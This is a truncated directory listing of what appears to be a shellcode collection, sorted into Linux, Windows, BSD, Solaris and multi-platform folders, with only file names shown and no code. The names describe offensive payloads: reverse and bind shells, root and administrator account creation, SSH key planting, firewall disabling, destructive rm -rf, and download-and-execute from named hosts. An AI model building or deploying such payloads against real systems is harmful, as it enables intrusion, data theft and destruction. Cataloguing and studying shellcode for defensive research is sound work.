├── Generator ├── ARM_-_Add_Root_User_Shellcode__Metasploit___66+_bytes___Generator___Shellcode_exploit_for_Generator_platform__Tags:_Metasploit_Framework │ └── shellcode.c ├── ARM_-_execve___bin_sh_,____bin_sh__,_NULL__Polymorphic_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── FreeBSD_x86_-_Reverse_TCP__bin_sh_Shell__127_0_0_1:1337_TCP__Shellcode__81_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_-_Reverse_TCP_Multi_Dual_Mode_Shell_Shellcode__129_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_-_execve__bin_sh_Polymorphic_With_Printable_ASCII_Characters_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_-_write___+_exit_0__Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_MIPS_-_XOR_Encoder_Shellcode__60_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP_Shell_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86-64_-_Reverse_TCP_Semi-Stealth__bin_bash_Shell_Shellcode__88+_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP_Shell_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__1234_TCP__Shellcode__87_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_Command_Generator_Null-Free_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_Create_File_With_Permission_7775_+_exit_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_Custom_execve_Shellcode__Encoder_Decoder___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── 
Linux_x86_-_Reverse_TCP_Shell_Shellcode__90_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_Reverse_TCP__bin_sh_Shell__192_168_13_22:31337_TCP__Shellcode__82_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_Shellcode_Obfuscator_Null-Free__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_Typewriter_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Linux_x86_-_execve_Null-Free_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Solaris_SPARC_-_Reverse_TCP_Shell__44434_TCP__XNOR_Encoded_Shellcode__600_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Solaris_x86_-_Bind_TCP_Shell_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Windows_-_Download_File_+_Execute_via_DNS__IPv6__Shellcode__Generator___Metasploit___Shellcode_exploit_for_Generator_platform__Tags:_Metasploit_Framework │ └── shellcode.c ├── Windows_-_Reverse_TCP_Shell__127_0_0_1:123_TCP__Alphanumeric_Shellcode__Encoder_Decoder___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Windows_XP_2000_2003_-_Reverse_TCP_Shell__127_0_0_1:53_TCP__Shellcode__275_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Windows_XP_SP1_-_Bind_TCP_Shell_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Windows_XP___10_-_Command_Generator_WinExec_Null-Free_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Windows_XP_x86-64_-_Download_File_+_Execute_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Windows_x86_-_Download_File_+_Execute_Shellcode__Browsers_Edition___275+_bytes___Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── 
Windows_x86_-_Multi-Format_Encoding_Tool_Shellcode__Generator___Shellcode_exploit_for_Generator_platform │ └── shellcode.c └── _Generator__-_HTTP_1_x_Requests_Shellcode__18+_26+_bytes___Shellcode_exploit_for_Generator_platform │ └── shellcode.c ├── Lin_x86-64 ├── Linux_x86-64_-_Add_Root_User__shell-storm_leet__Shellcode__390_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Add_Root_User__t0r_Winner__Shellcode__189_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_Ncat_Shell__4442_TCP____SSL___Multi-Channel__4444-4447_TCP____Persistant___Fork___IPv4_6___Password_Null-Free_Shellcode__176_bytes___Shel__ │ └── shellcode.c ├── Linux_x86-64_-_Bind_Netcat_Shell_Null-Free_Shellcode__64_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP_Shell__4442_TCP____Syscall_Persistent___Multi-Terminal__4444-4447_TCP____Password__la_crips____Daemon_Shellcode__83_148_177_bytes___S__ │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP_Shell__4444_TCP__Shellcode__132_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP_Shell__5600_TCP__Shellcode__81_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP_Shell__5600_TCP__Shellcode__86_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP_Shell__5600_TCP__Shellcode__87_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP__bin_sh_Password__1234__Shell__31173_TCP__Shellcode__92_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP__bin_sh_Password__hack__Shell__4444_TCP__Null-Free_Shellcode__162_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP__bin_sh_Shell__1472_TCP___IPv6__Shellcode__199_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── 
Linux_x86-64_-_Bind_TCP__bin_sh_Shell__4444_TCP__+_Password__Z~r0__Null-Free_Shellcode__81_96_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP__bin_sh_Shell__4444_TCP__Null-Free_Shellcode__103_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Bind_TCP__bin_sh_Shell__Random_TCP_Port__Shellcode__54_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Disable_ASLR_Security_Shellcode__143_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Download_File__http:__192_168_30_129_pri_sh__+_Execute_Used_To_Steal_Information_Shellcode__399_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Egghunter_Shellcode__18_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Egghunter_Shellcode__24_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Egghunter_Shellcode__38_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Flush_IPTables_Rules___sbin_iptables_-F__Polymorphic_Shellcode__47_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Flush_IPTables_Rules___sbin_iptables_-F__Shellcode__84_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Fork_Bomb_Shellcode__11_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_Kill_All_Processes_Shellcode__19_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve_Encoded_Shellcode__57_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve_Polymorphic_Shellcode__31_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve_Shellcode__22_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── 
Linux_x86-64_-_execve_Stack_Polymorphic_Shellcode__47_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve_XOR_Encoded_Shellcode__84_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve_XOR_NOT_DIV_Encoded_Shellcode__54_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve___bin_sh_0_,NULL,NULL_;_Position_Independent_Alphanumeric_Shellcode__87_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve___sbin_iptables_,____sbin_iptables_,__-F__,_NULL__Shellcode__49_bytes___Shellcode_exploit_for_Lin_x86-64___ │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_bash_Shellcode__33_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_-c_reboot_Shellcode__89_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Null-Free_Shellcode__30_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__21_Bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__22_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__24_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__25_bytes___1___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__25_bytes___2___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__26_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__30_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__31_bytes___1___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c 
├── Linux_x86-64_-_execve__bin_sh_Shellcode__31_bytes___2___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__33_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__34_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Shellcode__52_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_execve__bin_sh_Via_Push_Shellcode__23_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Linux_x86-64_-_mkdir_Shellcode__25_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c └── Linux_x86-64_-_mkdir____evil__Shellcode__30_bytes___Shellcode_exploit_for_Lin_x86-64_platform │ └── shellcode.c ├── Lin_x86 ├── Linux_IA32_-_execve__bin_sh_0xff-Free_Shellcode__45_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_i686_-_pacman_-R__package__Shellcode__59_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_i686_-_pacman_-S__package___default_package:_backdoor__Shellcode__64_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Add_Map__google_com_127_1_1_1__In__etc_hosts_Obfuscated_Shellcode__98_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Add_Map__google_com_127_1_1_1__In__etc_hosts_Shellcode__77_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Add_Root_User_Shellcode__104_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Add_Root_User__r00t__To__etc_passwd_Shellcode__69_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Add_Root_User__t00r__Anti-IDS_Shellcode__116_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Add_Root_User__t00r__Shellcode__82_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── 
Linux_x86_-_Add_Root_User__toor__To__etc_passwd_+_exit___Shellcode__107_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Add_Root_User__xtz__To__etc_passwd_Shellcode__59_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Add_Root_User__z__Shellcode__70_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Alphanumeric_Encoded_Shellcode__64_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Alphanumeric_Encoder__IMUL_Method__Shellcode__88_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Anti-Debug_Trick__INT_3h_trap__+_execve__bin_sh_Shellcode__39_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Append_RSA_key_to__root__ssh_authorized_keys2_Shellcode__295_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_Netcat_Shell__13377_TCP__Shellcode__Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_Netcat_Shell__5555_TCP__Shellcode__60_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_Netcat_Shell__98_TCP_+_UDP__Shellcode__44_52_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_Netcat___bin_nc___bin_sh_Shell__13337_TCP__Shellcode__56_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_Netcat___bin_nc___bin_sh_Shell__17771_TCP__Shellcode__58_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_Netcat___bin_nc___bin_sh_Shell__8080_TCP__Shellcode__75_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_Netcat___usr_bin_netcat___bin_sh_Shell__6666_TCP__+_Polymorphic_XOR_Encoded_Shellcode__69_93_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── 
Linux_x86_-_Bind_TCP_Listener__5555_TCP__+_Receive_Shellcode_+_Payload_Loader_Shellcode__83_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP_Shell__2707_TCP__Shellcode__84_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP_Shell__31337_TCP__+_setreuid_0,0__Polymorphic_Shellcode__131_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP_Shell__5074_TCP__+_fork___Shellcode__130_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP_Shell__5074_TCP__Shellcode__92_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP_Shell__5074_TCP__ToUpper_Encoded_Shellcode__226_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_bash_Shell__4444_TCP__Shellcode__656_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Password__gotfault__Shell__64713_TCP__Shellcode__166_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__1472_TCP___IPv6__Shellcode__1250_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__31337_TCP__+_fork___Shellcode__98_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__31337_TCP__+_setuid_Shellcode__96_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__31337_TCP__Shellcode__100_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__31337_TCP__Shellcode__80_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__33333_TCP__Shellcode__96_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── 
Linux_x86_-_Bind_TCP__bin_sh_Shell__4444_TCP__Null-Free_Shellcode__75_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__4444_TCP__Shellcode__98_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__4444_TCP__XOR_Encoded_Shellcode__152_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__64533_TCP__Shellcode__97_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__64713_TCP__Shellcode__86_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__8000_TCP__Shellcode__179_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_sh_Shell__Random_TCP_Port__Shellcode__44_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_Bind_TCP__bin_zsh_Shell__9090_TCP__Shellcode__96_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-__bin_rm_-rf___+_Attempts_To_Block_The_Process_From_Being_Stopped_Shellcode__132_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-__sys_chmod_syscall__chmod_0777__etc_passwd_Shellcode__39_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-__sys_chmod_syscall__chmod_0777__etc_shadow_Shellcode__39_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux_x86_-_execve__bin_sh_Shellcode__24_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c └── Linux_x86__Intel_x86_CPUID__-_execve__bin_sh_XORED_Encoded_Shellcode__41_bytes___Shellcode_exploit_for_Lin_x86_platform │ └── shellcode.c ├── Linux ├── Linux_-_Bind_Netcat_Shell__31337_TCP__Polymorphic_Shellcode__91_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c ├── Linux_-_Bind_TCP_Dual_Multi_Mode_Shell_Shellcode__156_bytes___Shellcode_exploit_for_Linux_platform │ 
└── shellcode.c ├── Linux_-_Bind_TCP_Shell__6778_TCP__XOR_Encoded_Polymorphic_Shellcode__125_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c ├── Linux_-_Find_All_Writeable_Folder_In_FileSystem_Polymorphic_Shellcode__91_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c ├── Linux_-_Write_SUID_Root_Shell___tmp__hiddenshell__Polymorphic_Shellcode__161_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c ├── Linux_-_execve___bin_sh_,_NULL,_0__Multi_Dual_Mode_Shellcode__37_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c ├── Linux_-_setreuid_0,0__+_execve___bin_sh_,NULL,NULL__XOR_Encoded_Shellcode__62_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c ├── Linux_x86_x86-64_-_Bind_TCP_Shell__4444_TCP__Shellcode__251_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c ├── Linux_x86_x86-64_-_Read__etc_passwd_Shellcode__156_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c └── Linux_x86_x86-64_-_Reverse_TCP_Shell__192_168_1_29:4444_TCP__Shellcode__195_bytes___Shellcode_exploit_for_Linux_platform │ └── shellcode.c ├── Multiple ├── BSD___Linux___Windows_x86_x86-64_-_execve___bin__sh_,_____bin_sh_,__-c_,__cmd__,_NULL__Execute_Command_Shellcode__194__ │ └── shellcode.c ├── BSD_x86___Linux_x86_-_execve__bin_sh_Shellcode__38_bytes___Shellcode_exploit_for_Multiple_platform │ └── shellcode.c ├── Linux_PPC___Linux_x86_-_execve___bin_sh_,___bin_sh_,NULL_,NULL__Shellcode__99_bytes___Shellcode_exploit_for_Multiple_platform │ └── shellcode.c ├── Linux_x86___Unix_SPARC_-_execve__bin_sh_Shellcode__80_bytes___Shellcode_exploit_for_Multiple_platform │ └── shellcode.c ├── Linux_x86___Unix_SPARC___IRIX_MIPS_-_execve__bin_sh_Shellcode__141_bytes___Shellcode_exploit_for_Multiple_platform │ └── shellcode.c └── OSX_PPC___OSX_x86_-_execve___bin_sh_,___bin_sh_,NULL_,NULL__Shellcode__121_bytes___Shellcode_exploit_for_Multiple_platform │ └── shellcode.c ├── README.md ├── Spider.py ├── Win_x86-64 ├── 
Windows_10_x64_-_Egghunter_Shellcode__45_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_2003_x64_-_Token_Stealing_Shellcode__59_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_7_Professional_SP1_x64__FR__-_Beep_Shellcode__39_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_7_x64_-_cmd_Shellcode__61_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_x64_-_API_Hooking_Shellcode__117_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_x64_-_Add_Administrator_User__ALI_ALI__+_Add_To_RDP_Group_+_Enable_RDP_From_Registry_+_STOP_Firewall_+_Auto_Start_Terminal_Service_Obfuscated_Shellco__ │ └── shellcode.c ├── Windows_x64_-_Bind_TCP_Password__h271508F__Shell__2493_TCP__Shellcode__825_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_x64_-_Bind_TCP_Shell__4444_TCP__Shellcode__508_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_x64_-_CreateRemoteThread___DLL_Injection_Shellcode__584_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_x64_-_Download_File__http:__192_168_10_129_pl_exe__+_Execute__C:_Users_Public_p_exe__Shellcode__358_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_x64_-_Reverse_TCP_Shell__192_168_232_129:4444_TCP__+_Injection_Shellcode__694_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Windows_x64_-__URLDownloadToFileA__Download_File__http:__localhost_trojan_exe__+_Execute_Shellcode__218+_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c └── Windows_x64_-_cmd_exe_WinExec___Shellcode__93_bytes___Shellcode_exploit_for_Win_x86-64_platform │ └── shellcode.c ├── Win_x86 ├── Windows_-_DCOM_RPC2_Universal_Shellcode__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── 
Windows_5_0___7_0_x86_-_Bind_TCP_Shell__28876_TCP__Null-Free_Shellcode__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_5_0___7_0_x86_-_Speaking__You_got_pwned!__Null-Free_Shellcode__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_7_x86_-_Bind_TCP_Shell__4444_TCP__Shellcode__357_Bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_7_x86_-_localhost_Port_Scanner_Shellcode__556_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_9x_NT_2000_XP_-_PEB_method_Shellcode__29_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_9x_NT_2000_XP_-_PEB_method_Shellcode__31_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_9x_NT_2000_XP_-_PEB_method_Shellcode__35_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_9x_NT_2000_XP_-_Reverse_Generic_without_Loader__192_168_1_11:4919__Shellcode__249_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_NT_2000_XP__Russian__-_Add_Administartor_User__slim_shady__Shellcode__318_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_NT_XP_x86_-_IsDebuggerPresent_Shellcode__39_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_PerfectXp-pc1_SP3_x86__Turkish__-_Add_Administrator_User__kpss_12345__Shellcode__112_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_SP1_SP2_x86_-_Beep_Shellcode__35_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_XP_-_Download_File__http:__www_elitehaven_net_ncat_exe__+_Execute__nc_exe__Null-Free_Shellcode__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_XP_Home_SP2__English__-_calc_exe_Shellcode__37_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows__Net_Framework_x86_-_Execute_Native_x86_Shellcode__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── 
Windows_x86_-_Add_Administrator_User__ALI_ALI__+_Add_To_RDP_Group_+_Enable_RDP_From_Registry_+_STOP_Firewall_+_Auto_Start_Terminal_Service_Obfuscated_Shellco__ │ └── shellcode.c ├── Windows_x86_-_Add_Administrator_User__GAZZA_123456__+_Start_Telnet_Service_Shellcode__111_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Add_Local_Administrator_User__secuid0_m0nk__Shellcode__326_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Bind_TCP_Password__damn_it!$$##@;*#__Shell_Shellcode__637_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Command_WinExec___Shellcode__104+_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_ConnectBack_+_Download_A_File_+_Save_+_Execute_Shellcode__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_CreateProcessA_cmd_exe_Shellcode__253_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Download_File_+_Execute_Shellcode__192_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Download_File_+_Run_via_WebDAV____192_168_1_19_c__Null-Free_Shellcode__96_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Download_File__http:__127_0_0_1_file_exe__+_Execute_Shellcode__124_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Download_File__http:__www_ph4nt0m_org_a_exe__+_Execute__C:_a_exe__Shellcode__226+_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Egg_Omelet_SEH_Shellcode__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Egghunter_Checksum_Routine_Shellcode__18_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Eggsearch_Shellcode__33_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── 
